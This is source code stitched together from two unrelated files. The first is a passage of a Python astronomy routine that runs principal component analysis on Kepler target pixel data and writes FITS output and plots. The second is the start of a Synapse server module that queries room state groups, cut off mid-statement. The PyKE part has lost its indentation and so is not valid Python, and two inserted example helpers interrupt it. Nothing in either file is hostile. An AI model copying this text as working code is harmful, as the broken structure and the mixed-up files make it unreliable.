kepmsg.log(logfile, hashline, verbose)
call = ('KEPPCA -- '
+ ' infile={}'.format(infile)
+ ' maskfile={}'.format(maskfile)
+ ' outfile={}'.format(outfile)
+ ' components={}'.format(components)
+ ' plotpca={}'.format(plotpca)
+ ' nmaps={}'.format(nmaps)
+ ' overwrite={}'.format(overwrite)
+ ' verbose={}'.format(verbose)
+ ' logfile={}'.format(logfile))
kepmsg.log(logfile, call + '\n', verbose)
kepmsg.clock('KEPPCA started at', logfile, verbose)
# overwrite output file
if overwrite:
kepio.overwrite(outfile, logfile, verbose)
if kepio.fileexists(outfile):
errmsg = ('ERROR -- KEPPCA: {} exists. Use overwrite=True'
.format(outfile))
kepmsg.err(logfile, errmsg, verbose)
# Set output file names - text file with data and plot
dataout = np.copy(outfile)
repname = re.sub('.fits', '.png', outfile)
# open input file
instr = pyfits.open(infile, mode='readonly', memmap=True)
tstart, tstop, bjdref, cadence = kepio.timekeys(instr, infile, logfile,
verbose)
# open TPF FITS file
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, barytime = \
kepio.readTPF(infile, 'TIME', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, tcorr = \
kepio.readTPF(infile, 'TIMECORR', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, cadno = \
kepio.readTPF(infile, 'CADENCENO', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, fluxpixels = \
kepio.readTPF(infile, 'FLUX', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, errpixels = \
kepio.readTPF(infile, 'FLUX_ERR', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, flux_bkg = \
kepio.readTPF(infile, 'FLUX_BKG', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, flux_bkg_err = \
kepio.readTPF(infile, 'FLUX_BKG_ERR', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, qual = \
kepio.readTPF(infile, 'QUALITY', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, pcorr1 = \
kepio.readTPF(infile, 'POS_CORR1', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, pcorr2 = \
kepio.readTPF(infile, 'POS_CORR2', logfile, verbose)
# Save original data dimensions, in case of using maskfile
xdimorig = xdim
ydimorig = ydim
# read mask definition file if it has been supplied
if 'aper' not in maskfile.lower() and maskfile.lower() != 'all':
maskx = np.array([], 'int')
masky = np.array([], 'int')
lines = kepio.openascii(maskfile, 'r', logfile, verbose)
for line in lines:
line = line.strip().split('|')
if len(line) == 6:
y0 = int(line[3])
x0 = int(line[4])
line = line[5].split(';')
for items in line:
try:
masky = np.append(masky, y0 + int(items.split(',')[0]))
maskx = np.append(maskx, x0 + int(items.split(',')[1]))
except:
continue
kepio.closeascii(lines, logfile, verbose)
if len(maskx) == 0 or len(masky) == 0:
errmsg = 'ERROR -- KEPPCA: {} contains no pixels.'.format(maskfile)
kepmsg.err(logfile, errmsg, verbose)
xdim = max(maskx) - min(maskx) + 1 # Find largest x dimension of mask
ydim = max(masky) - min(masky) + 1 # Find largest y dimension of mask
# pad mask to ensure it is rectangular
workx = np.array([], 'int')
worky = np.array([], 'int')
for ip in np.arange(min(maskx), max(maskx) + 1):
for jp in np.arange(min(masky), max(masky) + 1):
workx = np.append(workx, ip)
worky = np.append(worky, jp)
maskx = workx
masky = worky
# define new subimage bitmap...
if maskfile.lower() != 'all':
aperx = np.array([], 'int')
apery = np.array([], 'int')
# aperb is an array that contains the pixel numbers in the mask
aperb = maskx - x0 + xdimorig * (masky - y0)
npix = len(aperb)
# ...or use all pixels
if maskfile.lower() == 'all':
npix = xdimorig * ydimorig
aperb = np.array([], 'int')
aperb = np.r_[0: npix]
# legal mask defined?
if len(aperb) == 0:
message = ('ERROR -- KEPPCA: no legal pixels within the subimage are'
' defined.')
kepmsg.err(logfile, message, verbose)
# Identify principal components desired
pcaout = []
txt = components.strip().split(',')
for work1 in txt:
try:
pcaout.append(int(work1.strip()))
except:
work2 = work1.strip().split('-')
try:
for work3 in range(int(work2[0]), int(work2[1]) + 1):
pcaout.append(work3)
except:
errmsg = ('ERROR -- KEPPCA: cannot understand principal'
' component list requested')
kepmsg.err(logfile, errmsg, verbose)
pcaout = set(np.sort(pcaout))
# The list of pca component numbers to be removed
pcarem = np.array(list(pcaout)) - 1
# Initialize arrays and variables, and apply pixel mask to the data
ntim = 0
time = np.array([], dtype='float64')
timecorr = np.array([], dtype='float32')
cadenceno = np.array([], dtype='int')
pixseries = np.array([], dtype='float32')
errseries = np.array([], dtype='float32')
bkgseries = np.array([], dtype='float32')
berseries = np.array([], dtype='float32')
quality = np.array([], dtype='float32')
pos_corr1 = np.array([], dtype='float32')
pos_corr2 = np.array([], dtype='float32')
nrows = np.size(fluxpixels, 0)
# Apply the pixel mask so we are left with only the desired pixels
pixseriesb = fluxpixels[:, aperb]
errseriesb = errpixels[:, aperb]
bkgseriesb = flux_bkg[:, aperb]
berseriesb = flux_bkg_err[:, aperb]
# Read in the data to various arrays
for i in range(nrows):
if (qual[i] < 10000 and np.isfinite(barytime[i])
and np.isfinite(fluxpixels[i, int(ydim * xdim / 2 + 0.5)])
and np.isfinite(fluxpixels[i, 1 + int(ydim * xdim / 2 + 0.5)])):
ntim += 1
time = np.append(time, barytime[i])
timecorr = np.append(timecorr, tcorr[i])
cadenceno = np.append(cadenceno, cadno[i])
pixseries = np.append(pixseries, pixseriesb[i])
errseries = np.append(errseries, errseriesb[i])
bkgseries = np.append(bkgseries, bkgseriesb[i])
berseries = np.append(berseries, berseriesb[i])
quality = np.append(quality, qual[i])
pos_corr1 = np.append(pos_corr1, pcorr1[i])
pos_corr2 = np.append(pos_corr2, pcorr2[i])
pixseries = np.reshape(pixseries,(ntim, npix))
errseries = np.reshape(errseries,(ntim, npix))
bkgseries = np.reshape(bkgseries,(ntim, npix))
berseries = np.reshape(berseries,(ntim, npix))
tmp = np.ma.median(np.ma.masked_invalid(pixseries), axis=1)
for i in range(len(tmp)):
pixseries[i] = pixseries[i] - tmp[i]
pixseries = np.ma.masked_invalid(pixseries)
# Figure out which pixels are undefined/nan and remove them.
# Keep track for adding back in later
nanpixels = np.array([], dtype='int')
i = 0
while i < npix:
if np.isnan(pixseries[0, i]):
nanpixels = np.append(nanpixels, i)
npix = npix - 1
i = i + 1
pixseries = np.delete(pixseries, nanpixels, 1)
errseries = np.delete(errseries, nanpixels, 1)
pixseries[np.isnan(pixseries)] = random.gauss(100, 10)
errseries[np.isnan(errseries)] = 10
# Compute statistical weights, means, standard deviations
weightseries = (pixseries / errseries) ** 2
pixMean = np.average(pixseries, axis=0, weights=weightseries)
pixStd = np.std(pixseries, axis=0)
# Normalize the input by subtracting the mean and dividing by the standard
# deviation.
# This makes it a correlation-based PCA, which is what we want.
pixseriesnorm = (pixseries - pixMean) / pixStd
# Number of principal components to compute. Setting it equal to the number
# of pixels
nvecin = npix
# Run PCA using the MDP Whitening PCA, which produces normalized PCA
# components (zero mean and unit variance)
pcan = mdp.nodes.WhiteningNode(svd=True)
pcar = pcan.execute(pixseriesnorm)
eigvec = pcan.get_recmatrix()
model = pcar
# Re-insert nan columns as zeros
for i in range(len(nanpixels)):
nanpixels[i] = nanpixels[i] - i
eigvec = np.insert(eigvec, nanpixels, 0, 1)
pixMean = np.insert(pixMean, nanpixels, 0, 0)
# Make output eigenvectors (correlation images) into xpix by ypix images
eigvec = eigvec.reshape(nvecin, ydim, xdim)
# Calculate sum of all pixels to display as raw lightcurve and other quantities
pixseriessum = np.sum(pixseries, axis=1)
# Number of components to remove
nrem = len(pcarem)
# Number of pcas to plot - currently set to plot all components, but could set
# nplot = nrem to just plot as many components as are being removed
nplot = npix
# Subtract components by fitting them to the summed light curve
x0 = np.tile(-1.0, 1)
for k in tqdm(range(nrem)):
def f(x):
fluxcor = pixseriessum
for k in range(len(x)):
fluxcor = fluxcor - x[k]*model[:, pcarem[k]]
return mad(fluxcor)
if k == 0:
x0 = np.array([-1.0])
else:
x0 = np.append(x0, 1.0)
myfit = opt.fmin(f, x0, maxiter=50000, maxfun=50000, disp=False)
x0 = myfit
# Now that coefficients for all components have been found, subtract them
# to produce a calibrated time-series,
# and then divide by the robust mean to produce a normalized time series
# as well
c = myfit
fluxcor = pixseriessum
for k in range(0, nrem):
fluxcor = fluxcor - c[k] * model[:, pcarem[k]]
normfluxcor = fluxcor / np.nanmean(reject_outliers(fluxcor, 2))
# input file data
cards0 = instr[0].header.cards
cards1 = instr[1].header.cards
cards2 = instr[2].header.cards
table = instr[1].data[:]
maskmap = np.copy(instr[2].data)
# subimage physical WCS data
crpix1p = cards2['CRPIX1P'].value
crpix2p = cards2['CRPIX2P'].value
crval1p = cards2['CRVAL1P'].value
crval2p = cards2['CRVAL2P'].value
cdelt1p = cards2['CDELT1P'].value
cdelt2p = cards2['CDELT2P'].value
# dummy columns for output file
sap_flux_err = np.empty(len(time))
sap_flux_err[:] = np.nan
sap_bkg = np.empty(len(time))
sap_bkg[:] = np.nan
sap_bkg_err = np.empty(len(time))
sap_bkg_err[:] = np.nan
pdc_flux = np.empty(len(time))
pdc_flux[:] = np.nan
pdc_flux_err = np.empty(len(time))
pdc_flux_err[:] = np.nan
psf_centr1 = np.empty(len(time))
psf_centr1[:] = np.nan
psf_centr1_err = np.empty(len(time))
psf_centr1_err[:] = np.nan
psf_centr2 = np.empty(len(time))
psf_centr2[:] = np.nan
psf_centr2_err = np.empty(len(time))
psf_centr2_err[:] = np.nan
mom_centr1 = np.empty(len(time))
mom_centr1[:] = np.nan
mom_centr1_err = np.empty(len(time))
mom_centr1_err[:] = np.nan
mom_centr2 = np.empty(len(time))
mom_centr2[:] = np.nan
mom_centr2_err = np.empty(len(time))
mom_centr2_err[:] = np.nan
# mask bitmap
if 'aper' not in maskfile.lower() and maskfile.lower() != 'all':
for i in range(maskmap.shape[0]):
for j in range(maskmap.shape[1]):
aperx = np.append(aperx, crval1p + (j + 1 - crpix1p) * cdelt1p)
apery = np.append(apery, crval2p + (i + 1 - crpix2p) * cdelt2p)
if maskmap[i, j] == 0:
pass
else:
maskmap[i, j] = 1
for k in range(len(maskx)):
if aperx[-1] == maskx[k] and apery[-1] == masky[k]:
maskmap[i, j] = 3
# construct output primary extension
hdu0 = pyfits.PrimaryHDU()
for i in range(len(cards0)):
if cards0[i].keyword not in hdu0.header.keys():
hdu0.header[cards0[i].keyword] = (cards0[i].value,
cards0[i].comment)
else:
hdu0.header.cards[cards0[i].keyword].comment = cards0[i].comment
kepkey.history(call, hdu0, outfile, logfile, verbose)
outstr = pyfits.HDUList(hdu0)
# construct output light curve extension
col1 = pyfits.Column(name='TIME', format='D', unit='BJD - 2454833',
array=time)
col2 = pyfits.Column(name='TIMECORR', format='E', unit='d', array=timecorr)
col3 = pyfits.Column(name='CADENCENO', format='J', array=cadenceno)
col4 = pyfits.Column(name='SAP_FLUX', format='E', unit='e-/s',
array=pixseriessum)
col5 = pyfits.Column(name='SAP_FLUX_ERR', format='E', unit='e-/s',
array=sap_flux_err)
col6 = pyfits.Column(name='SAP_BKG', format='E', unit='e-/s',
array=sap_bkg)
col7 = pyfits.Column(name='SAP_BKG_ERR', format='E', unit='e-/s',
array=sap_bkg_err)
col8 = pyfits.Column(name='PDCSAP_FLUX', format='E', unit='e-/s',
array=pdc_flux)
col9 = pyfits.Column(name='PDCSAP_FLUX_ERR', format='E', unit='e-/s',
array=pdc_flux_err)
col10 = pyfits.Column(name='SAP_QUALITY', format='J', array=quality)
col11 = pyfits.Column(name='PSF_CENTR1', format='E', unit='pixel',
array=psf_centr1)
col12 = pyfits.Column(name='PSF_CENTR1_ERR', format='E', unit='pixel',
array=psf_centr1_err)
col13 = pyfits.Column(name='PSF_CENTR2', format='E', unit='pixel',
array=psf_centr2)
col14 = pyfits.Column(name='PSF_CENTR2_ERR', format='E', unit='pixel',
array=psf_centr2_err)
col15 = pyfits.Column(name='MOM_CENTR1', format='E', unit='pixel',
array=mom_centr1)
col16 = pyfits.Column(name='MOM_CENTR1_ERR', format='E', unit='pixel',
array=mom_centr1_err)
col17 = pyfits.Column(name='MOM_CENTR2', format='E', unit='pixel',
array=mom_centr2)
col18 = pyfits.Column(name='MOM_CENTR2_ERR', format='E', unit='pixel',
array=mom_centr2_err)
col19 = pyfits.Column(name='POS_CORR1', format='E', unit='pixel',
array=pos_corr1)
col20 = pyfits.Column(name='POS_CORR2', format='E', unit='pixel',
array=pos_corr2)
col21 = pyfits.Column(name='PCA_FLUX', format='E', unit='e-/s',
array=fluxcor)
col22 = pyfits.Column(name='PCA_FLUX_NRM', format='E', array=normfluxcor)
cols = pyfits.ColDefs([col1, col2, col3, col4, col5, col6, col7, col8,
col9, col10, col11, col12, col13, col14, col15,
col16, col17, col18, col19, col20, col21, col22])
hdu1 = pyfits.BinTableHDU.from_columns(cols)
hdu1.header['TTYPE1'] = ('TIME', 'column title: data time stamps')
hdu1.header['TFORM1'] = ('D', 'data type: float64')
hdu1.header['TUNIT1'] = ('BJD - 2454833',
'column units: barycenter corrected JD')
hdu1.header['TDISP1'] = ('D12.7', 'column display format')
hdu1.header['TTYPE2'] = ('TIMECORR',
'column title: barycentric-timeslice correction')
hdu1.header['TFORM2'] = ('E', 'data type: float32')
hdu1.header['TUNIT2'] = ('d', 'column units: days')
hdu1.header['TTYPE3'] = ('CADENCENO',
'column title: unique cadence number')
hdu1.header['TFORM3'] = ('J', 'column format: signed integer32')
hdu1.header['TTYPE4'] = ('SAP_FLUX',
'column title: aperture photometry flux')
hdu1.header['TFORM4'] = ('E', 'column format: float32')
hdu1.header['TUNIT4'] = ('e-/s', 'column units: electrons per second')
hdu1.header['TTYPE5'] = ('SAP_FLUX_ERR',
'column title: aperture phot. flux error')
hdu1.header['TFORM5'] = ('E', 'column format: float32')
hdu1.header['TUNIT5'] = ('e-/s',
'column units: electrons per second (1-sigma)')
hdu1.header['TTYPE6'] = ('SAP_BKG',
'column title: aperture phot. background flux')
hdu1.header['TFORM6'] = ('E', 'column format: float32')
hdu1.header['TUNIT6'] = ('e-/s', 'column units: electrons per second')
hdu1.header['TTYPE7'] = ('SAP_BKG_ERR',
'column title: ap. phot. background flux error')
hdu1.header['TFORM7'] = ('E', 'column format: float32')
hdu1.header['TUNIT7'] = ('e-/s',
'column units: electrons per second (1-sigma)')
hdu1.header['TTYPE8'] = ('PDCSAP_FLUX',
'column title: PDC photometry flux')
hdu1.header['TFORM8'] = ('E', 'column format: float32')
hdu1.header['TUNIT8'] = ('e-/s', 'column units: electrons per second')
hdu1.header['TTYPE9'] = ('PDCSAP_FLUX_ERR', 'column title: PDC flux error')
hdu1.header['TFORM9'] = ('E', 'column format: float32')
hdu1.header['TUNIT9'] = ('e-/s',
'column units: electrons per second (1-sigma)')
hdu1.header['TTYPE10'] = ('SAP_QUALITY',
'column title: aperture photometry quality flag')
hdu1.header['TFORM10'] = ('J', 'column format: signed integer32')
hdu1.header['TTYPE11'] = ('PSF_CENTR1',
'column title: PSF fitted column centroid')
hdu1.header['TFORM11'] = ('E', 'column format: float32')
hdu1.header['TUNIT11'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE12'] = ('PSF_CENTR1_ERR',
'column title: PSF fitted column error')
hdu1.header['TFORM12'] = ('E', 'column format: float32')
hdu1.header['TUNIT12'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE13'] = ('PSF_CENTR2',
'column title: PSF fitted row centroid')
hdu1.header['TFORM13'] = ('E', 'column format: float32')
hdu1.header['TUNIT13'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE14'] = ('PSF_CENTR2_ERR',
'column title: PSF fitted row error')
hdu1.header['TFORM14'] = ('E', 'column format: float32')
hdu1.header['TUNIT14'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE15'] = ('MOM_CENTR1',
'column title: moment-derived column centroid')
hdu1.header['TFORM15'] = ('E', 'column format: float32')
hdu1.header['TUNIT15'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE16'] = ('MOM_CENTR1_ERR',
'column title: moment-derived column error')
hdu1.header['TFORM16'] = ('E', 'column format: float32')
hdu1.header['TUNIT16'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE17'] = ('MOM_CENTR2',
'column title: moment-derived row centroid')
hdu1.header['TFORM17'] = ('E', 'column format: float32')
hdu1.header['TUNIT17'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE18'] = ('MOM_CENTR2_ERR',
'column title: moment-derived row error')
hdu1.header['TFORM18'] = ('E', 'column format: float32')
hdu1.header['TUNIT18'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE19'] = ('POS_CORR1',
'column title: column correction for velocity aberration')
hdu1.header['TFORM19'] = ('E', 'column format: float32')
hdu1.header['TUNIT19'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE20'] = ('POS_CORR2',
'column title: row correction for velocity aberration')
hdu1.header['TFORM20'] = ('E', 'column format: float32')
hdu1.header['TUNIT20'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE21'] = ('PCA_FLUX', 'column title: PCA-corrected flux')
hdu1.header['TFORM21'] = ('E', 'column format: float32')
hdu1.header['TUNIT21'] = ('e-/s', 'column units: electrons per second')
hdu1.header['TTYPE22'] = ('PCA_FLUX_NRM',
'column title: normalized PCA-corrected flux')
hdu1.header['TFORM22'] = ('E', 'column format: float32')
hdu1.header['EXTNAME'] = ('LIGHTCURVE', 'name of extension')
for i in range(len(cards1)):
if (cards1[i].keyword not in hdu1.header.keys() and
cards1[i].keyword[:4] not in ['TTYP', 'TFOR', 'TUNI', 'TDIS',
'TDIM', 'WCAX', '1CTY', '2CTY',
'1CRP', '2CRP', '1CRV', '2CRV',
'1CUN', '2CUN', '1CDE', '2CDE',
'1CTY', '2CTY', '1CDL', '2CDL',
'11PC', '12PC', '21PC', '22PC']):
hdu1.header[cards1[i].keyword] = (cards1[i].value, cards1[i].comment)
outstr.append(hdu1)
# construct output mask bitmap extension
hdu2 = pyfits.ImageHDU(maskmap)
for i in range(len(cards2)):
if cards2[i].keyword not in hdu2.header.keys():
hdu2.header[cards2[i].keyword] = (cards2[i].value,
cards2[i].comment)
else:
hdu2.header.cards[cards2[i].keyword].comment = cards2[i].comment
outstr.append(hdu2)
# construct principal component table
cols = [pyfits.Column(name='TIME', format='E', unit='BJD - 2454833',
array=time)]
for i in range(len(pcar[0, :])):
colname = 'PC' + str(i + 1)
col = pyfits.Column(name=colname, format='E', array=pcar[:, i])
cols.append(col)
hdu3 = pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))
hdu3.header['EXTNAME'] = ('PRINCIPAL_COMPONENTS', 'name of extension')
hdu3.header['TTYPE1'] = ('TIME', 'column title: data time stamps')
hdu3.header['TFORM1'] = ('D', 'data type: float64')
hdu3.header['TUNIT1'] = ('BJD - 2454833',
'column units: barycenter corrected JD')
hdu3.header['TDISP1'] = ('D12.7', 'column display format')
for i in range(len(pcar[0, :])):
hdu3.header['TTYPE' + str(i + 2)] = ("PC" + str(i + 1),
"column title: principal "
"component number " + str(i + 1))
hdu3.header['TFORM' + str(i + 2)] = ('E', 'column format: float32')
outstr.append(hdu3)
# write output file
print("Writing output file {}...".format(outfile))
outstr.writeto(outfile)
# close input structure
instr.close()
# Create PCA report
if plotpca:
npp = 7 # Number of plots per page
l = 1
repcnt = 1
for k in range(nmaps):
# First plot of every page with flux image,
# flux and calibrated time series
if (k % (npp - 1) == 0):
plt.figure(figsize=[10, 16])
plt.subplot2grid((npp,6), (0, 0), colspan=2)
plt.imshow(np.log10(np.flipud(pixMean.reshape(ydim,xdim)) - min(pixMean) + 1),
interpolation="nearest",cmap='RdYlBu')
plt.xticks([])
plt.yticks([])
ax1 = plt.subplot2grid((npp, 6), (0, 2), colspan=4)
px = np.copy(time) + bjdref
py = np.copy(pixseriessum)
px, xlab = kepplot.cleanx(px, logfile, verbose)
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
kepplot.RangeOfPlot(px, py, 0.01, False)
kepplot.plot1d(px, py, cadence, '#0000ff', 1.0, '#ffff00', 0.2,
True)
py = np.copy(fluxcor)
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
plt.plot(px, py, marker='.', color='r', linestyle='',
markersize=1.0)
kepplot.labels('', re.sub(r'\)', '', re.sub(r'Flux \(', '', ylab)),
'k', 14)
plt.grid()
plt.setp(ax1.get_xticklabels(), visible=False)
# plot principal components
plt.subplot2grid((npp, 6), (l, 0), colspan=2)
plt.imshow(eigvec[k], interpolation="nearest", cmap='RdYlBu')
plt.xlim(-0.5, xdim-0.5)
plt.ylim(-0.5, ydim-0.5)
plt.xticks([])
plt.yticks([])
# The last plot on the page that should have the xlabel
if (k % (npp - 1) == npp - 2 or k == nvecin - 1):
plt.subplot2grid((npp, 6), (l, 2), colspan=4)
py = np.copy(model[:, k])
kepplot.RangeOfPlot(px, py, 0.01, False)
kepplot.plot1d(px, py, cadence, 'r', 1.0, 'g', 0.2, True)
kepplot.labels(xlab, 'PC ' + str(k + 1), 'k', 14)
plt.grid()
plt.tight_layout()
l = 1
plt.savefig(re.sub('.png', '_%d.png' % repcnt,repname))
repcnt += 1
# The other plots on the page that should have no xlabel
else:
ax2 = plt.subplot2grid((npp, 6), (l, 2), colspan=4)
py = np.copy(model[:, k])
kepplot.RangeOfPlot(px, py, 0.01, False)
kepplot.plot1d(px, py, cadence, 'r', 1.0, 'g', 0.2, True)
kepplot.labels('', 'PC ' + str(k + 1), 'k', 14)
plt.grid()
plt.setp(ax2.get_xticklabels(), visible=False)
plt.tight_layout()
l=l+1
plt.savefig(re.sub('.png', '_%d.png' % repcnt, repname))
# plot style and size
if plotpca:
plt.figure()
plt.clf()
# plot aperture photometry and PCA corrected data
ax = kepplot.location([0.06, 0.54, 0.93, 0.43])
px = np.copy(time) + bjdref
py = np.copy(pixseriessum)
px, xlab = kepplot.cleanx(px, logfile, verbose)
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
kepplot.RangeOfPlot(px, py, 0.01, False)
kepplot.plot1d(px, py, cadence, '#0000ff', 1.0, '#ffff00', 0.2, True)
py = np.copy(fluxcor)
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
kepplot.plot1d(px, py, cadence, 'r', 2, '#ffff00', 0.0, True)
plt.setp(plt.gca(), xticklabels=[])
kepplot.labels('', ylab, 'k', 14)
plt.grid()
# plot aperture photometry and PCA corrected data
ax = kepplot.location([0.06, 0.09, 0.93, 0.43])
yr = np.array([], 'float32')
npc = min([6, nrem])
for i in range(npc - 1, -1, -1):
py = pcar[:, i] * c[i]
py, ylab = kepplot.cleany(py, 1.0, logfile, verbose)
cl = float(i) / (float(npc))
kepplot.plot1d(px, py, cadence, [1.0 - cl, 0.0, cl], 2, '#ffff00',
0.0, True)
yr = np.append(yr, py)
y1 = max(yr)
y2 = -min(yr)
kepplot.RangeOfPlot(px, np.array([-y1, y1, -y2, y2]), 0.01, False)
kepplot.labels(xlab, 'Principal Components', 'k', 14)
plt.grid()
# save plot to file
plt.savefig(repname)
# render plot
plt.show()
# stop time
kepmsg.clock('KEPPCA ended at', logfile, verbose)
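# Hedged example (not part of the original task definition): keppca can also be
# called directly from Python rather than via the command line; the target
# pixel file name below is the one used in the docstring example.
def _example_keppca():  # pragma: no cover
    keppca("ktwo202073445-c00_lpd-targ.fits.gz", maskfile='ALL',
           components='1-3', plotpca=True, nmaps=10, overwrite=True,
           verbose=True, logfile='keppca.log')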
def reject_outliers(data, m):
"""Outlier rejection for computing robust mean"""
try:
return data[np.abs(data - np.nanmean(data)) < m * np.std(data)]
except:
print("Warning: Could not reject outliers.")
return data
def mad(data):
"""
Mean absolute deviation function used for fitting the PCA components to
the data and subtracting them out
"""
return np.nanmean(np.absolute(data - np.nanmean(data)))
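# Tiny illustrative check (an added sketch, not part of the original module).
# For data = [1, 2, 3, 4, 100] the mean is 22, so mad() returns the mean of the
# absolute deviations |data - 22|, i.e. (21 + 20 + 19 + 18 + 78) / 5 = 31.2.
def _example_mad():  # pragma: no cover
    return mad(np.array([1.0, 2.0, 3.0, 4.0, 100.0]))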
def keppca_main():
import argparse
parser = argparse.ArgumentParser(
description='Pixel-level principal component analysis of time series',
formatter_class=PyKEArgumentHelpFormatter)
parser.add_argument('infile', help='Name of input target pixel FITS file',
type=str)
parser.add_argument('--outfile',
help=('Name of FITS file to output.'
' If None, outfile is infile-keppca.'),
default=None)
parser.add_argument('--maskfile', help='Name of mask defintion ASCII file',
default='ALL', type=str)
parser.add_argument('--components', default='1-3',
help='Principal components to be removed', type=str)
parser.add_argument('--plotpca', action='store_true',
help='Create PCA plots?')
parser.add_argument('--nmaps', default=10,
help='Number of principal components to include in report',
type=int)
parser.add_argument('--overwrite', action='store_true',
help='Overwrite output file?')
parser.add_argument('--verbose', action='store_true',
help='Write to a log file?')
parser.add_argument('--logfile', '-l', help='Name of ascii log file',
default='keppca.log', dest='logfile', type=str)
args = parser.parse_args()
keppca(args.infile, args.outfile, args.maskfile, args.components,
args.plotpca, args.nmaps, args.overwrite, args.verbose, args.logfile)
|
|
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import TYPE_CHECKING, Dict, List, Mapping, Optional, Tuple, Union
from synapse.storage._base import SQLBaseStore
from synapse.storage.database import (
DatabasePool,
LoggingDatabaseConnection,
LoggingTransaction,
)
from synapse.storage.engines import PostgresEngine
from synapse.storage.state import StateFilter
from synapse.types import MutableStateMap, StateMap
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
MAX_STATE_DELTA_HOPS = 100
class StateGroupBackgroundUpdateStore(SQLBaseStore):
"""Defines functions related to state groups needed to run the state background
updates.
"""
def _count_state_group_hops_txn(
self, txn: LoggingTransaction, state_group: int
) -> int:
"""Given a state group, count how many hops there are in the tree.
This is used to ensure the delta chains don't get too long.
"""
if isinstance(self.database_engine, PostgresEngine):
sql = """
WITH RECURSIVE state(state_group) AS (
VALUES(?::bigint)
UNION ALL
SELECT prev_state_group FROM state_group_edges e, state s
WHERE s.state_group = e.state_group
)
SELECT count(*) FROM state;
"""
txn.execute(sql, (state_group,))
row = txn.fetchone()
if row and row[0]:
return row[0]
else:
return 0
else:
# We don't use WITH RECURSIVE on sqlite3 as there are distributions
# that ship with an sqlite3 version that doesn't support it (e.g. wheezy)
next_group: Optional[int] = state_group
count = 0
while next_group:
next_group = self.db_pool.simple_select_one_onecol_txn(
txn,
table="state_group_edges",
keyvalues={"state_group": next_group},
retcol="prev_state_group",
allow_none=True,
)
if next_group:
count += 1
return count
def _get_state_groups_from_groups_txn(
self,
txn: LoggingTransaction,
groups: List[int],
state_filter: Optional[StateFilter] = None,
) -> Mapping[int, StateMap[str]]:
state_filter = state_filter or StateFilter.all()
results: Dict[int, MutableStateMap[str]] = {group: {} for group in groups}
where_clause, where_args = state_filter.make_sql_filter_clause()
# Unless the filter clause is empty, we're going to append it after an
# existing where clause
if where_clause:
where_clause = " AND (%s)" % (where_clause,)
if isinstance(self.database_engine, PostgresEngine):
# Temporarily disable sequential scans in this transaction. This is
# a temporary hack until we can add the right indices in
txn.execute("SET LOCAL enable_seqscan=off")
# The below query walks the state_group tree so that the "state"
# table includes all state_groups in the tree. It then joins
# against `state_groups_state` to fetch the latest state.
# It assumes that previous state groups are always numerically
# lesser.
# The PARTITION is used to get the event_id in the greatest state
# group for the given type, state_key.
# This may return multiple rows per (type, state_key), but last_value
# should be the same.
sql = """
WITH RECURSIVE state(state_group) AS (
VALUES(?::bigint)
UNION ALL
SELECT prev_state_group FROM state_group_edges e, state s
WHERE s.state_group = e.state_group
)
SELECT DISTINCT ON (type, state_key)
type, state_key, event_id
FROM state_groups_state
WHERE state_group IN (
SELECT state_group FROM state
) %s
ORDER BY type, state_key, state_group DESC
"""
for group in groups:
args: List[Union[int, str]] = [group]
args.extend(where_args)
txn.execute(sql % (where_clause,), args)
for row in txn:
typ, state_key, event_id = row
key = (typ, state_key)
results[group][key] = event_id
else:
max_entries_returned = state_filter.max_entries_returned()
# We don't use WITH RECURSIVE on sqlite3 as there are distributions
# that ship with an sqlite3 version that doesn't support it (e.g. wheezy)
for group in groups:
next_group: Optional[int] = group
while next_group:
# We did this before by getting the list of group ids, and
# then passing that list to sqlite to get latest event for
# each (type, state_key). However, that was terribly slow
# without the right indices (which we can't add until
# after we finish deduping state, which requires this func)
args = [next_group]
args.extend(where_args)
txn.execute(
"SELECT type, state_key, event_id FROM state_groups_state"
" WHERE state_group = ? " + where_clause,
args,
)
results[group].update(
((typ, state_key), event_id)
for typ, state_key, event_id in txn
if (typ, state_key) not in results[group]
)
# If the number of entries in the (type,state_key)->event_id dict
# matches the number of (type,state_keys) types we were searching
# for, then we must have found them all, so no need to go walk
# further down the tree... UNLESS our types filter contained
# wildcards (i.e. Nones) in which case we have to do an exhaustive
# search
if (
max_entries_returned is not None
